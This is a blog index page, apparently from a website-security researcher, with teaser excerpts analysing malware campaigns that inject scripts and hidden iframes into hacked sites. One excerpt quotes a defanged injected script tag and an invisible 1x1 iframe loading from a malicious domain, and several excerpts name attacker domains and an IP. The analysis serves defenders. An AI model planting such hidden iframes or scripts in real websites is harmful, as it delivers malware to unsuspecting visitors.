Lorem Ipsum and Twitter Trends in Malware
A couple of years ago I wrote about malware attacks that used Twitter API to generate domain names for their malicious sites using trending topics as keys in the domain generating algorithm.
- Each domain was in use for a few hours only
- The next domain names would become available just a few hours before the malicious scripts on hacked sites begin to use them.
Since 2009, I’ve seen many revisions of that attack. It has never been the most prevalent issue but as far as I can tell it constantly evolves and mutates. The recent update of the malicious script injected by this attack looked quite interesting and I decided to find out what has changed since late 2009.
Continue »»
Ciscotred .cz .cc – Joomla Hack
During the last few days I’ve noticed an increased number of websites that redirect search traffic to ciscotred .cz .cc. The typical Unmask Parasites report looks like this:
Versatile .CC Attacks
A few days ago I tweeted that “this year the most popular TLD for malicious sites is .CC“. I conducted some research on the most prevalent attacks that use the .CC TLD and now want to elaborate on what is going on.
Continue »»
Injected Script Loads Host.exe Using Hidden Iframes and Java Applets
Today, I can see many blacklisted sites where Google report one of the following three domains as a source of the problem:
- aubreyserr .com
- medien-verlag .de
- yennicq .be
E.g.
Malicious software is hosted on 1 domain(s), including medien-verlag.de/.
The attack is quite interesting so I decided to share results of my initial investigation here.
Continue »»
Two Malware Trends Combined in One Attack
Two of the major trends in malware attacks described on this blog this summer were the use of hijacked DNS records of legitimate domains and continuous attacks against sites on MediaTemple and RackSpace. In the end of this September, I noticed a new attack that combined these two trends.
At higher level, this attack is no different from many preceding variations that hit MediaTemple. It prepends malicious code to the first line of some existing .js files or injects it inside the <ads>…</ads> tags at the bottom of HTML code of legitimate web pages.
However, soon you notice new techniques.
Continue »»
Geezter, Qawfer and Other Malicious Iframes From 121 .156 .57 .184
This is a short post about one of the ongoing attacks. It injects the following script [usually] at the very bottom of the HTML
Continue »»
“Inlovebot” and “Crazymasya” Iframes on RackSpace
A few days ago I noticed a new mass infection of sites on RackSpace. It mostly affects WordPress blogs and sites hosted under the same account with WordPress blogs.
Hackers create malicious .js files in some subdirectory of the compromised sites and inject links to those .js files into website pages.
Continue »»
Pqshow .org Scripts – New Plague On MediaTemple Sites
New week — new attack on MediaTemple-hosted sites.
Almost everything remains the same as in the last week’s attack I described here. The only difference is the new script and the new remote malicious site – bl .pqshow .org.
Continue »»
Malicious “ads” and “bars” on RackSpace & MediaTemple
Right before this week-end I noticed an increased number of sites hosted on MediaTemple and RackSpace coming to Unmask Parasites with the same problem — their sites are blocked by Google and their diagnostic pages mention the following five domains: “myads .name“, “adsnet .biz“, “toolbarcom .org“, “mybar .us“, “freead .name“.
Continue »»
NewGeoCheck.js and Malicious AddThiss .net Iframe
Yesterday, I checked one site that had the following text on its Google Safe Browsing diagnostic page:
Malicious software is hosted on 1 domain(s), including addthiss .net/.
Unmask Parasites didn’t detect anything suspicious but a quick manual check revealed the following script tag right after the <body> tag in every web page:
<sc ript type="text/javascript" src="newgeocheck.js"></script>
(Unmask Parasites doesn’t check .js file, so no wonder it couldn’t detect the source of the problem)
This script loaded an invisible iframe form addthiss .net.
<i frame width="1" height="1" frameborder="0" scrolling="no" marginwidth="0" marginheight="0" style="" src="hxxp://addthiss .net/ in.cgi?8"></iframe>
Here goes the real investigation »»
About this blog
Occasional posts from the developer of
Unmask Parasites about things that hackers already know and site owners should know (if they don't want to be victims).
Exploit reviews, security tips, and all that jazz.
Recent Posts
Categories
- General (18)
- Hosting+Security (3)
- Short Attack Reviews (8)
- Tips and Tricks (13)
- Tweet Week (83)
- Unmask Parasites (12)
- Website exploits (71)
Recent Comments
Has your website been hacked?
We're here to help you get back up and running with minimal downtime!
Call us now at 1-800-639-6442
www.HackRepair.com